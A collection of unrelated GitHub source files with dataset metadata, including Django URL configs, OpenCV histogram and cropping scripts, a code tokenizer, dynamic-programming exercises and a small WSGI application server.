normally\n distributed components.\n\n https://arxiv.org/abs/1704.08370 Eq. (4)\n\n Parameters\n ----------\n dataset: dict\n Dictionary of numpy arrays for 'cos_tilt_1' and 'cos_tilt_2'.\n xi_spin: float\n Fraction of black holes in preferentially aligned component.\n sigma_1: float\n Width of preferentially aligned component for the more\n massive black hole.\n sigma_2: float\n Width of preferentially aligned component for the less\n massive black hole.\n \"\"\"\n prior = ((1 - xi_spin) / 4 + xi_spin *\n truncnorm(dataset['cos_tilt_1'], 1, sigma_1, 1, -1) *\n truncnorm(dataset['cos_tilt_2'], 1, sigma_2, 1, -1))\n return prior\n","repo_name":"cjhaster/gwpopulation","sub_path":"gwpopulation/models/spin.py","file_name":"spin.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"69919163367","text":"# -*- coding: utf-8 -*-\n\"\"\"OrderManagementSystem URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom OrderManagementSystem import settings\nfrom c_index import views\n\nurlpatterns = [\n url(r'^$', views.index), # 直接进入首页\n url(r'^admin/', include(admin.site.urls)),\n url(r'^tinymce/', include('tinymce.urls')),\n url(r'^', include('c_login.urls')),\n url(r'^', include('c_register.urls')),\n url(r'^', include('c_index.urls')),\n url(r'^', include('c_chart.urls')),\n url(r'^', include('c_order.urls')),\n url(r'^', include('b_home.urls')),\n url(r'^', include('b_login.urls')),\n # url(r'^search/', include('haystack.urls')),\n # url(r'^search/', views.MySearchView.as_view()),\n\n]\n\n# 让 Django 给通过开发服务器上传的媒体文件提供服务\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Justinzhao666/OrderManagementSystem","sub_path":"OrderManagementSystem/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72288196649","text":"import strawberry\nfrom strawberry_django_plus import gql\n\nfrom app_schema import mutations, queries, subscriptions\n\n\n@gql.type\nclass Queries(\n queries.Query,\n):\n ...\n\n\n@gql.type\nclass Mutations(\n mutations.Mutation,\n):\n ...\n\n\n@gql.type\nclass Subscriptions(\n subscriptions.Subscription,\n):\n ...\n\n\nschema = strawberry.Schema(\n query=Queries,\n mutation=Mutations,\n subscription=Subscriptions,\n)\n","repo_name":"ZipBrandon/pgschemas_async","sub_path":"pgschemas_async/app_schema/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3102970187","text":"import json\nfrom datetime import datetime\nimport serial\n\nclass Gateway:\n \"\"\"\n Gateway Class\n\n SUPPORT:\n JSON-only communication messages.\n\n FUNCTIONS:\n checksum()\n parse()\n reset()\n \"\"\"\n def __init__(self, use_checksum=False, timeout=1, baud=38400, device=\"/dev/ttyACM0\"):\n \"\"\"\n Initialize the Gateway\n \"\"\"\n # Get settings\n self.use_checksum = use_checksum\n self.device = device\n self.baud = baud\n self.timeout = timeout\n\n try:\n self.port = serial.Serial(self.device, self.baud, timeout=self.timeout)\n except Exception as e:\n self.port = None\n raise e\n\n def byteify(self, input):\n if isinstance(input, dict):\n return {self.byteify(key) : self.byteify(value) for key,value in input.iteritems()}\n elif isinstance(input, list):\n return [self.byteify(element) for element in input]\n elif isinstance(input, unicode):\n return input.encode('utf-8')\n else:\n return input\n\n def poll(self, chars=256, force_read=False): \n s = self.port.readline()\n msg = self.byteify(json.loads(s)) # parse as JSON\n if self.use_checksum:\n chksum = self.checksum(msg['data'])\n if self.checksum(msg['data']) == msg['chksum']: # run checksum of parsed dictionary\n return msg # return data if checksum ok\n else:\n return None # return None if checksum failed\n else:\n return msg\n\n def checksum(self, data, mod=256, force_precision=2):\n \"\"\"\n Calculate checksum\n \"\"\"\n chksum = 0\n s = str(data)\n s_clean = s.replace(' ', '')\n for i in s_clean:\n chksum += ord(i)\n return chksum % mod\n\n def reset(self):\n 
pass\n","repo_name":"trevstanhope/rhum","sub_path":"manager/tools/CAN.py","file_name":"CAN.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12004553988","text":"import os\r\nimport cv2\r\n\r\npath = \"../output\"\r\npath3 = \"../../web_final\"\r\nw = 1920\r\nh = 1080\r\nimg_total = []\r\ntxt_total = []\r\nfile = os.listdir(path)\r\nfor filename in file:\r\n first, last = os.path.splitext(filename)\r\n if last == \".jpg\":\r\n img_total.append(first)\r\n else:\r\n txt_total.append(first)\r\nfor img_ in img_total:\r\n if img_ in txt_total:\r\n filename_img = img_ + \".jpg\"\r\n path1 = os.path.join(path, filename_img)\r\n img = cv2.imread(path1)\r\n filename_txt = img_ + \".txt\"\r\n n = 1\r\n with open(os.path.join(path, filename_txt), \"r+\", encoding=\"utf-8\", errors=\"ignore\") as f:\r\n for line in f:\r\n aa = line.split(\" \")\r\n x_center = w * float(aa[1])\r\n y_center = h * float(aa[2])\r\n width = int(w * float(aa[3]))\r\n height = int(h * float(aa[4]))\r\n lefttopx = int(x_center - width / 2.0)\r\n lefttopy = int(y_center - height / 2.0)\r\n roi = img[lefttopy + 1:lefttopy + height - 1, lefttopx + 1:lefttopx + width - 1]\r\n filename_last = img_ + \"_\" + str(n) + \".jpg\"\r\n print(filename_last)\r\n path2 = os.path.join(path3, \"roi\")\r\n cv2.imwrite(os.path.join(path2, filename_last), roi)\r\n n = n + 1\r\n else:\r\n continue\r\n","repo_name":"JerryAuas/web_final","sub_path":"tools/save_img.py","file_name":"save_img.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"10693633599","text":"import os\nINITIAL_FRAME_RATE = 10\nJPEG_QUALITY = 20\n\n\nEXPLORE_INTERVAL=1\nPIPELINE_UPDATE_PRECISION=0.1\n\nQ_READ_TIMEOUT = 10000\nINPUT_VIDEO = 0#\"test_video40.avi\"#0#\"/Users/davide/Google Drive/University/PhD/19_sigcom_w/GOPR9840.MP4\"#0#\"test_video40.avi\"\nMAX_IMG_QUEUE = 10\nSAVE_IMG = False\nSHOW_IMG = False\nDAEMONIAC_THREADS = True\nCONNECTION_STRING = \"/dev/ttyUSB0\"#\"127.0.0.1:14550\"\n\n# Variables for detection -> movement\nMAX_IMG_QUEUE = 3\nX_CUTOFF = 0.1\nY_CUTOFF = 0.1\nAREA_CUTOFF = 1000\nFORWARD = 1\nBACKWARD = -1\nRIGHT = 1\nLEFT = -1\nUP = 1\nDOWN = -1\nTARGET_AREA = 10000\n\nALPHA = 0.1\nMOVEMENT_DURATION = 0.4\n\nBUFF_SIZE = 1024\nMODEL_PATH = \"models\"\n\nMESSAGE = \"Oh bella ciao\"\nQ_READ_TIMEOUT = 10000\nDEVICE_STATE_UPDATE = 0.5\n\nUDP_DISCOVERY_PORT = 5006\nINITIAL_TCP_PORT = 12001\nBUFF_SIZE = 1024\nJPEG = True\n\nLOGS_PATH = \"logs\"\nBOOKKEEPER_path = os.path.join(LOGS_PATH, \"_tenboom.csv\")\nFLIGHTLOG_NAME_path = os.path.join(LOGS_PATH, \"FlightLog_{}.csv\")\nDEVICE_LOG_path = os.path.join(LOGS_PATH, \"bubi_{}.csv\")\nBOOKKEEPER = \"_tenboom.csv\"\nFLIGHTLOG_NAME = \"FlightLog_{}.csv\"\nDEVICE_LOG = \"bubi_{}.csv\"\n\nDELTA_E = 0.3\nDELTA_L = 0.7\n\nmodels = [\"ssd_mobilenet_v1_coco_2018_01_28\",\n \"ssd_resnet50_v1_fpn_shared_box_predictor_640x640_coco14_sync_2018_07_03\",\n \"ssd_mobilenet_v2_coco_2018_03_29\",\n \"ssdlite_mobilenet_v2_coco_2018_05_09\",\n \"ssdlite_mobilenet_v2_coco_FP32_50_trt.pb\"]\n\nDECISION_POLICY = \"energy_saving\"\nENERGY_SAVING_THR = 0.25\nVERBOSE = False","repo_name":"uci-iasl/SeReMAS","sub_path":"config_v3_2.py","file_name":"config_v3_2.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} 
+{"seq_id":"22185657922","text":"# USAGE\n# python David_1_12_1_color_histograms.py --image beach.png\n# python David_1_12_1_color_histograms.py --image \"../../data/horseshoe_bend.png\"\n# python David_1_12_1_color_histograms.py --image \"../../../CV-PyImageSearch Gurus Course/Dataset/data/horseshoe_bend.png\"\n\n# interpolation : https://matplotlib.org/3.1.3/gallery/images_contours_and_fields/interpolation_methods.html\n\n# 1. Preprocessing : \n\n # 1.1 import the necessary packages\nfrom matplotlib import pyplot as plt\nimport argparse\nimport imutils\nimport cv2\n\n # 1.2 construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args[\"image\"])\nprint(\"image:\",image)\nprint(image.shape) # (475, 600, 3)\nprint(type(image)) # numpy array\n\n# 2. Flattened' Color Histogram : \n\n # 2.1 (!!) Figure 1 , Flattened' Color Histogram\n # 2.1.1 numpy -> List\nchans = cv2.split(image)\nprint(\"chans:\",chans)\nprint(type(chans))\n\n # 2.2 Add Plot describe (plo中 標題(title)及x, y軸的文字描述)\ncolors = (\"B\",\"G\",\"R\") \nplt.figure()\nplt.title(\"Flatten-color-Histogram\")\nplt.xlabel(\"x axis(Bins)\")\nplt.ylabel(\"Y axis (# of Pixels)\")\n\n # 2.3 (!!!) loop to visualize in the plot(用迴圈繪出圖形)\nfor (chan, i) in zip(chans, colors): # 放到for裡面的chans是一個list的型態\n \n\t# create a histogram for the current channel and plot it\n\thist = cv2.calcHist([chan], [0], None, [256], [0, 256])\n\tplt.plot(hist, color = i)\n\tplt.xlim([0, 256]) # 設定x軸範圍(一般來說都落在 0-255中)\n\n# 3. 2D histograms : \n # let's move on to 2D histograms -- we need to reduce the number of bins in the histogram from 256 to 32 so we can better visualize the results\nfig = plt.figure()\n\n # 2.1.1 plot a 2D color histogram for green and blue\nax = fig.add_subplot(131)\nhist = cv2.calcHist([chans[1], chans[0]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for G and B\")\nplt.colorbar(p)\n\n # 2.1.2 plot a 2D color histogram for green and red\nax = fig.add_subplot(132)\nhist = cv2.calcHist([chans[1], chans[2]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for G and R\")\nplt.colorbar(p)\n\n # 2.1.3 plot a 2D color histogram for blue and red\nax = fig.add_subplot(133)\nhist = cv2.calcHist([chans[0], chans[2]], [0, 1], None, [32, 32],\n\t[0, 256, 0, 256])\np = ax.imshow(hist, interpolation=\"nearest\")\nax.set_title(\"2D Color Histogram for B and R\")\nplt.colorbar(p)\n\n\n# 4. 
2D Histogram and 3D Histogram shape\n \n # 4.1 (2D Hist shape 與 flatten shape ) : make sure the 2D Hist shape and the flatten shape values \n # finally, let's examine the dimensionality of one of the 2D histograms\nprint(\"2D histogram shape: {}, with {} values\".format(\n\thist.shape, hist.flatten().shape[0])) # 2D histogram shape: (32, 32), with 1024 values\n\n\n # 4.2 3D Histogram shape(只能show shape無法建3D圖) : \n # our 2D histogram could only take into account 2 out of the 3 channels in the image so now let's build a 3D color histogram\n # (utilizing all channels) with 8 bins in each direction -- we can't plot the 3D histogram, but the theory is exactly like\n # that of a 2D histogram, so we'll just show the shape of the histogram\n\nhist = cv2.calcHist([image], [0, 1, 2], None, [8, 8, 8], [0, 256, 0, 256, 0, 256])\nprint(\"3D histogram shape: {}, with {} values\".format(\n\thist.shape, hist.flatten().shape[0])) # 3D histogram shape: (8, 8, 8), with 512 values\n\n# display the image with matplotlib to avoid GUI conflicts on macOS\nplt.figure()\nplt.axis(\"off\")\nplt.imshow(imutils.opencv2matplotlib(image))\n\n# Show our plots\nplt.show()\nplt.close()\n\n#-------------------------- chp1_12_2 grayscale_histogram.py\n\n\n# 1. Turn to grayscale\n\nimage = cv2.imread(args[\"image\"])\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\nprint(\"image : \", type(image))\nprint(\"image shape: \", image.shape)\ncv2.imshow(\"image\",image)\n\n # 1.1 (!!)construct a grayscale histogram\nhist = cv2.calcHist([image], [0], None, [256], [0, 256])\nprint(\"hist : \", type(hist))\nprint(\"hist shape: \", hist.shape)\ncv2.imshow(\"hist\",hist)\ncv2.waitKey(0)\n\n\n # matplotlib expects RGB images so convert and then display the image\n # with matplotlib to avoid GUI conflicts/errors (mainly on macOS)\nplt.figure()\nplt.axis(\"on\") # x ,y axis reveal or not\nplt.imshow(cv2.cvtColor(image, cv2.COLOR_GRAY2RGB))\n\n # plot the histogram\nplt.figure()\nplt.title(\"Grayscale-Histogram\")\nplt.xlabel(\"Bins\")\nplt.ylabel(\"# of Pixels\")\nplt.plot(hist)\nplt.xlim([0, 256])\n\n # 1.2(!!) normalize the histogram\n # plot the normalized histogram\n\nhist /= hist.sum()\nplt.figure()\nplt.title(\"Grayscale Histogram (Normalized)\")\nplt.xlabel(\"x axis(Bins)\")\nplt.ylabel(\"Y axis - % of Pixels \")\nplt.plot(hist)\nplt.xlim([0, 256])\nplt.show()\nplt.close()\n\n# ----------------------- chp1_12_3 equalize.py (均衡化)\n\n #(!!) 
cv2.equalizeHist()只提供灰度值處理 RGB匯報錯\n \n \n# apply histogram equalization to stretch the constrast of our image\nequalize = cv2.equalizeHist(image)\n# show our images -- notice how the constrast of the second image has\n# been stretched\ncv2.imshow(\"Original\", image)\ncv2.imshow(\"Histogram Equalization\", equalize)\ncv2.waitKey(0)\n\n\n\n# ------------------------------ chp1_12_4 histogram_with_mask.py 這張可以學習如何遮罩\nimport numpy as np\n\n\n# grab the image channels, initialize the tuple of colors and the figure\n\ndef plot_histogram(image, title, mask = None) :\n\tchans = cv2.split(image)\n\tcolors = (\"b\", \"g\", \"r\")\n\tplt.figure()\n\tplt.title(title)\n\tplt.xlabel(\"Bins\")\n\tplt.ylabel(\"# of Pixels\")\n\n\t# loop over the image channels\n\tfor (chan, color) in zip(chans, colors):\n\t\t# create a histogram for the current channel and plot it\n\t\thist = cv2.calcHist([chan], [0], mask, [256], [0, 256])\n\t\tplt.plot(hist, color=color)\n\t\tplt.xlim([0, 256])\n \nimage = cv2.imread(args[\"image\"])\ncv2.imshow(\"Original\", image)\nplot_histogram(image, \"Histogram for Original Image\")\n\n # construct a mask for our image -- our mask will be BLACK for regions\n # we want to IGNORE and WHITE for regions we want to EXAMINE\nmask = np.zeros(image.shape[:2], dtype=\"uint8\")\ncv2.rectangle(mask, (60, 290), (210, 390), 255, -1) # 設定mask區域\ncv2.imshow(\"Mask\", mask)\n\n # 原影像圖與mask結合 ,what does masking our image look like?\nmasked = cv2.bitwise_and(image, image, mask=mask) \ncv2.imshow(\"Applying the Mask\", masked)\n\n # compute a histogram for our image, but we'll only include pixels in the masked region\nplot_histogram(image, \"Histogram for Masked Image\", mask=mask)\nplt.show()","repo_name":"wcsodw1/Computer-Vision","sub_path":"CV_Pyimage/Module 1 CV Basic Technical/chp_1_12_histograms/David_1_12_1_color_histograms.py","file_name":"David_1_12_1_color_histograms.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13401578588","text":"import re\nimport sys\nimport tree_sitter\n\nfrom sctokenizer import CppTokenizer, JavaTokenizer\nfrom sctokenizer.token import TokenType, Token\nfrom typing import List\n\n\ndef _join_by_rows(tokens: List[Token]):\n rows = []\n current_row = -1\n for token in tokens:\n if token.line > current_row:\n current_row = token.line\n rows.append([])\n rows[-1].append(token.token_value)\n\n row_strs = [' '.join(row) for row in rows]\n return row_strs\n\n\ndef fix_join_artifacts(text: str):\n # remove spaces between dots\n text = re.sub(r'\\s?\\.\\s?(?=\\w+)', '.', text)\n # remove spaces between underscores\n text = re.sub(r'_\\s?(?=\\w+)', '_', text)\n # replace 0X with 0x\n text = re.sub(r'0X', '0x', text)\n return text\n\n\ndef fix_single_quotes(input_str: str):\n # removes all spaces between single quotes to fix char pasing\n return re.sub(r\"\\s+(?=(?:(?:[^']*'){2})*[^']*'[^']*$)\", '', input_str)\n\n\ndef tokens_to_strings(tokens: List[Token]):\n row_joined = _join_by_rows(tokens)\n return ' '.join(fix_single_quotes(fix_join_artifacts(x)) for x in row_joined)\n\n\ndef sanitize_name(name):\n # https://github.com/eliphatfs/torch.redstone\n return re.sub(r'\\W|^(?=\\d)', '_', name)\n\n\ndef _split_name(c_token: str) -> List[str]:\n res = []\n snake_splitted = _try_split_snake(c_token)\n for tok in snake_splitted:\n res.extend(_try_split_camel(tok))\n return res\n\n\ndef _try_split_snake(c_token: str) -> List[str]:\n words = c_token.split('_')\n res = ['_'] 
* (len(words) * 2 - 1)\n res[0::2] = words\n return res\n\n\ndef _try_split_camel(c_token: str) -> List[str]:\n return re.sub(r'((?<=[a-z])[A-Z]|(?<!\\A)[A-Z](?=[a-z]))', r' \\1', c_token).split()\n\n\ndef split_string_literal(c_token: str) -> List[str]:\n # remove escape sequences\n stripped = re.sub(r'\\\\.', '', c_token)\n\n # remove enclosing quotes\n if stripped.startswith('\"') or stripped.startswith(\"'\"):\n stripped = stripped[1:]\n if stripped.endswith('\"') or stripped.endswith(\"'\"):\n stripped = stripped[:-1]\n\n return ['\"'] + stripped.strip().split() + ['\"']\n\n\ndef split_identifier(c_token: str) -> List[str]:\n if '/' in c_token: # include path\n res = []\n for subtok in c_token.split('/'):\n res.extend(split_identifier(subtok))\n res.append('/')\n return res\n else:\n return _split_name(c_token)\n\n\nclass JavaScriptTokenizer:\n def __init__(self):\n parser = tree_sitter.Parser()\n parser_lang = tree_sitter.Language('./parser/languages.so', 'javascript')\n parser.set_language(parser_lang)\n self.parser = parser\n\n def collect_tokens(self, root: tree_sitter.Node) -> List[Token]:\n tokens = []\n\n def _collect_token(node: tree_sitter.Node):\n if node.type == 'comment':\n return\n elif node.type in {'number'}:\n tokens.append(\n Token(node.text.decode(), TokenType.CONSTANT, node.start_point[0],\n node.start_point[1]))\n elif node.type in {'string', 'template_string', 'regex'}:\n tokens.append(\n Token(node.text.decode(), TokenType.STRING, node.start_point[0],\n node.start_point[1]))\n elif node.type in {\n 'identifier', 'shorthand_property_identifier',\n 'shorthand_property_identifier_pattern'\n }:\n tokens.append(\n Token(node.text.decode(), TokenType.IDENTIFIER, node.start_point[0],\n node.start_point[1]))\n elif node.child_count == 0:\n tokens.append(\n Token(node.text.decode(), TokenType.KEYWORD, node.start_point[0],\n node.start_point[1]))\n else:\n assert node.child_count > 0\n for ch in node.children:\n _collect_token(ch)\n\n _collect_token(root)\n return tokens\n\n def tokenize(self, code: str) -> List[Token]:\n tree = self.parser.parse(bytes(code, 'utf-8'))\n tokens = self.collect_tokens(tree.root_node)\n return tokens\n\n\nclass CodeTokenizer:\n def __init__(self, lang: str = 'c'):\n self.lang = lang\n if lang in ('c', 'cpp'):\n self.tokenizer = CppTokenizer()\n elif lang == 'java':\n self.tokenizer = JavaTokenizer()\n elif lang == 'javascript':\n self.tokenizer = JavaScriptTokenizer()\n else:\n raise ValueError(f'Unsupported language: {lang}')\n\n def _tokens_postprocess(self, tokens: List[Token]):\n res = []\n for token in tokens:\n if token.token_type == TokenType.COMMENT_SYMBOL:\n # res.append('__comment__')\n # raise RuntimeError('No comment allowed!')\n # warnings.warn('sctokenizer found \"comments\" in the code')\n # NOTE: for some reason sctokenizer may create \"comments\" in the code\n continue\n if token.token_type == TokenType.STRING:\n res.extend(split_string_literal(token.token_value))\n # res.append('__string__')\n elif token.token_type == TokenType.CONSTANT:\n res.append(token.token_value)\n # res.append('__constant__')\n elif token.token_type == TokenType.IDENTIFIER:\n res.extend(split_identifier(token.token_value))\n elif len(token.token_value) > 40:\n # the tokenizer is sometimes buggy\n # skip extremely long 'token's\n res.append('')\n else:\n res.append(token.token_value)\n return res\n\n def get_tokens(self, source: str):\n code_tokens = self.tokenizer.tokenize(source)\n return code_tokens, self._tokens_postprocess(code_tokens)\n\n\nif __name__ == '__main__':\n\n def main(argv):\n \"\"\"Driver mostly for testing purposes.\"\"\"\n for 
filename in argv[1:]:\n with open(filename, 'r') as f:\n source = f.read()\n if source is None:\n continue\n for token in CodeTokenizer().get_tokens(source):\n print(token)\n\n main(sys.argv)\n","repo_name":"YBRua/SrcMarker","sub_path":"code_tokenizer.py","file_name":"code_tokenizer.py","file_ext":"py","file_size_in_byte":6327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18324012323","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : file_method.py\n# @Author: Lizi\n# @Date : 2020/10/8\n\nimport sys\ntext = sys.stdin.read()\nwords = text.split()\nwordcount = len(words)\nprint(wordcount)","repo_name":"rage-vampire/Python","sub_path":"lizi_project/file/file_method.py","file_name":"file_method.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1032899519","text":"\n#top down /memoization\ndef frogJump(arr,index):\n if index==0:\n return 0\n if dp[index]!=-1:\n return dp[index]\n left=frogJump(arr,index-1)+abs(arr[index]-arr[index-1])\n right=float('inf')\n if index>1:\n right=min(frogJump(arr,index-2),right)+abs(arr[index]-arr[index-2])\n dp[index]=min(left,right)\n return dp[index]\n\n\n\narr=[30,10,60,10,60,50]\ndp=[-1]*(len(arr))\nprint(frogJump(arr,5))\nprint(dp)\n\n# bottom up (tabulation)\n\ndef frogJumpBU(arr,index):\n dp=[0]*len(arr)\n if index==0:\n dp[0]=0\n for i in range(1,len(arr)):\n left=dp[i-1]+abs(arr[i]-arr[i-1])\n right=float('inf')\n if i>1:\n right=dp[i-2]+abs(arr[i]-arr[i-2])\n dp[i]=min(left,right)\n return dp[index]\n\n\narr=[30,10,60,10,60,50]\n\n# print(frogJumpBU(arr,5))\n# print(dp)\n\n\n# def frogJumpK(arr,index,k):\n# if index==0:\n# return 0\n# # if dp[index]!=-1:\n# # return dp[index]\n# for i in range(1,k):\n# if index-k>=0:\n# val=frogJumpK(arr,index-i,k)+abs(arr[index]-arr[index-i])\n# print(val)\n# res=min(res,val)\n# return res\n#\n#\n# arr=[30,10,60,10,60,50]\n#\n# print(frogJumpK(arr,5,2))\n# print(dp)\n#\n","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"recursion/DPStriver/1DDP/2FrogJump.py","file_name":"2FrogJump.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18841385462","text":"from django.urls import path\nfrom .views import RoomView, CreateRoomView, GetRoom, JoinRoom, UsersInRoom, LeaveRoom, UpdateRoomView\n\n#add url pattern for each view\nurlpatterns = [\n path('room', RoomView.as_view()),\n path('create-room', CreateRoomView.as_view()),\n path('get-room', GetRoom.as_view()),\n path('join-room', JoinRoom.as_view()),\n path('user-ir', UsersInRoom.as_view()),\n path('leave', LeaveRoom.as_view()),\n path('update-room', UpdateRoomView.as_view()),\n]\n","repo_name":"DLiSWE/Listening-Room","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28541635692","text":"from tkinter import *\n\ndef change_img():\n path = inputBox.get()\n img = PhotoImage(file = path)\n imageLabel.configure(image = img)\n imageLabel.image = img\n\nwindow = Tk()\n\nphoto = PhotoImage(file = \"C:\\\\Practice-Python\\\\chap05\\\\03-back.gif\")\nimageLabel=Label(window, image=photo)#'label' 속성 'image='을 이용하여 레이블안에 이미지 표시.\nimageLabel.pack()\n\ninputBox=Entry(window)\ninputBox.pack()\n\nbutton = 
Button(window, text='Submit',command=change_img)\nbutton.pack()\n\nwindow.mainloop()","repo_name":"JunRain2/Practice_Py","sub_path":"chap10/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2578621831","text":"# Module: wuase_svr.py / version: 1.5 / build: 20211224\n# Purpose: Retrieve application and system information\n# Harris Georgiou (c) 2021, Email:hgeorgiou@unipi.gr\n\n# use only standard modules for cross-platform portability\nimport configparser, logging, logging.handlers, argparse\nfrom wsgiref.simple_server import make_server\nfrom urllib.parse import parse_qs\nimport os, sys, time\nimport app_info # local module\n\n\nclass AppServices():\n '''Class for automating command-line options, configuration file and logging'''\n\n PARAM_CMD = 'command' # URL key for 'command' parameter\n PARAM_CONTENT = 'content' # URL key for 'content' parameter\n\n CMD_HELLO = 'HELLO' # HELLO: print a hello message (verify connection)\n CMD_ECHO = 'ECHO' # ECHO: print back the 'content' argument\n CMD_VER = 'VER' # VER: return service version\n CMD_QUIT = 'QUIT' # QUIT: shutdown the server\n\n\n def __init__(self, app_name='', app_version='<0.0.0>', app_copyright='', \n app_config=''):\n '''Initialize instance (constructor)'''\n self.app_name = app_name\n self.app_version = app_version\n self.app_copyright = app_copyright\n self.app_config = app_config\n self.ip_allow_list = '' # to be updated after configuration fetching\n self.svr_port = -1 # to be updated after configuration fetching\n self.log_level = '' # to be updated after configuration fetching\n\n\n def get_sys_info(self):\n '''Return system information'''\n return (app_info.get_sys_info())\n\n\n def get_app_info(self):\n '''Return application information'''\n # retrieve application and system info, return as string\n return (app_info.get_app_info( self.app_name, self.app_version, self.app_copyright))\n\n\n def init_opt(self):\n '''Command-line options handler (see 'argparse' for details)'''\n self.cmdopt = argparse.ArgumentParser(description=self.app_name+' core functionality.')\n # options '-h' and '--help' are implemented implicitly\n self.cmdopt.add_argument('--version', action='version', version='%(prog)s '+self.app_version)\n self.cmdopt.add_argument('-v', '--verbose', action='store_true', dest='verbose',\n default=False, help='enable verbose mode, detailed logging is enabled')\n self.cmdopt.add_argument('-q', '--quiet', action='store_true', dest='quiet',\n default=False, help='enable quiet mode, no output is printed')\n self.cmdopt.add_argument('-c', '--config', action='store', dest='cfgfile',\n default=self.app_config, help=('configuration file (default=\\'%s\\')' % self.app_config))\n args = self.cmdopt.parse_args()\n self.opt = vars(args)\n\n\n def init_cfg(self, fname=None):\n '''Configuration file handler'''\n if (fname != None):\n cfg_filename = fname # use the given filename if not null\n else:\n cfg_filename = self.opt['config'] # get from command-line options\n # open configuration file for all application parameters\n self.cfg = configparser.ConfigParser()\n self.cfg.read_file(open(cfg_filename)) # read configuration from file\n\n\n def init_log_timeR(self, fname, loglevel, logwhen, loginterval, logcycle):\n '''Logging handler, time-based rotation (see 'logging' for details)'''\n # initialize logger with time-based rotation\n self.log = logging.getLogger(__name__) # use module name as logger id\n 
self.log.setLevel(loglevel) # set logging level (from string)\n fh = logging.handlers.TimedRotatingFileHandler(fname, when=logwhen, interval=int(loginterval), backupCount=int(logcycle))\n fmt = logging.Formatter('%(asctime)s; %(levelname)s; %(message)s') # set default logging format\n fh.setLevel(loglevel)\n fh.setFormatter(fmt)\n self.log.addHandler(fh)\n\n\n def init_log_sizeR(self, fname, loglevel, loglimit, logcycle):\n '''Logging handler, size-based rotation (see 'logging' for details)'''\n # initialize logger with size-based rotation\n self.log = logging.getLogger(__name__) # use module name as logger id\n self.log.setLevel(loglevel) # set logging level (from string)\n fh = logging.handlers.RotatingFileHandler(fname, maxBytes=int(loglimit), backupCount=int(logcycle))\n #fh = logging.handlers.TimedRotatingFileHandler(fname, when='m', interval=1, backupCount=3)\n fmt = logging.Formatter('%(asctime)s; %(levelname)s; %(message)s') # set default logging format\n fh.setLevel(loglevel)\n fh.setFormatter(fmt)\n self.log.addHandler(fh)\n\n\n def wsgi_app(self, environ, start_response, exc_info=None):\n '''WSGI loop for handling HTTP requests\n Example call: http://localhost:15387?command=ECHO&content=someone\n '''\n try:\n t0 = time.time_ns() # start timer (optional)\n\n # input: get parameters from http query string\n qs = parse_qs(environ['QUERY_STRING'])\n client_cmd = qs.get(self.PARAM_CMD,['None'])[0]\n client_content = qs.get(self.PARAM_CONTENT,['None'])[0]\n client_ip = environ['REMOTE_ADDR']\n\n # process: based on input data\n client_cmd = client_cmd.upper() # convert command tag to uppercase (optional)\n if client_ip not in self.ip_allow_list:\n print('Client dropped (connecting from: %s)' % client_ip)\n raise Exception # drop client with no message in response\n else: # client IP allowed, handle the request normally\n #time.sleep(1) # do some real work here (testing)\n if (client_cmd == self.CMD_ECHO):\n print('-> Request(1): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, self.PARAM_CONTENT, client_content))\n response = client_content\n elif (client_cmd == self.CMD_VER):\n print('-> Request(2): %s=\\'%s\\' , %s=\\'%s\\'' % (self.PARAM_CMD, client_cmd, 